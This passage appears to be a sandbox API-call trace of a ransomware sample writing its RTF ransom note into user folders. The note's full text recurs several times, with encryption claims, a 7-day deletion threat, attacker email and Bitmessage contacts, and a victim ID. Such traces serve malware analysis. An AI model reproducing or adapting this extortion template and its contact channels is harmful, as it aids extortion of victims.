}}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.202] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.202] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.202] CloseHandle (hObject=0x2ec) returned 1 [0291.202] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\#readme_eman#.rtf")) returned 0xffffffff [0291.203] GetLastError () returned 0x2 [0291.203] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.203] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 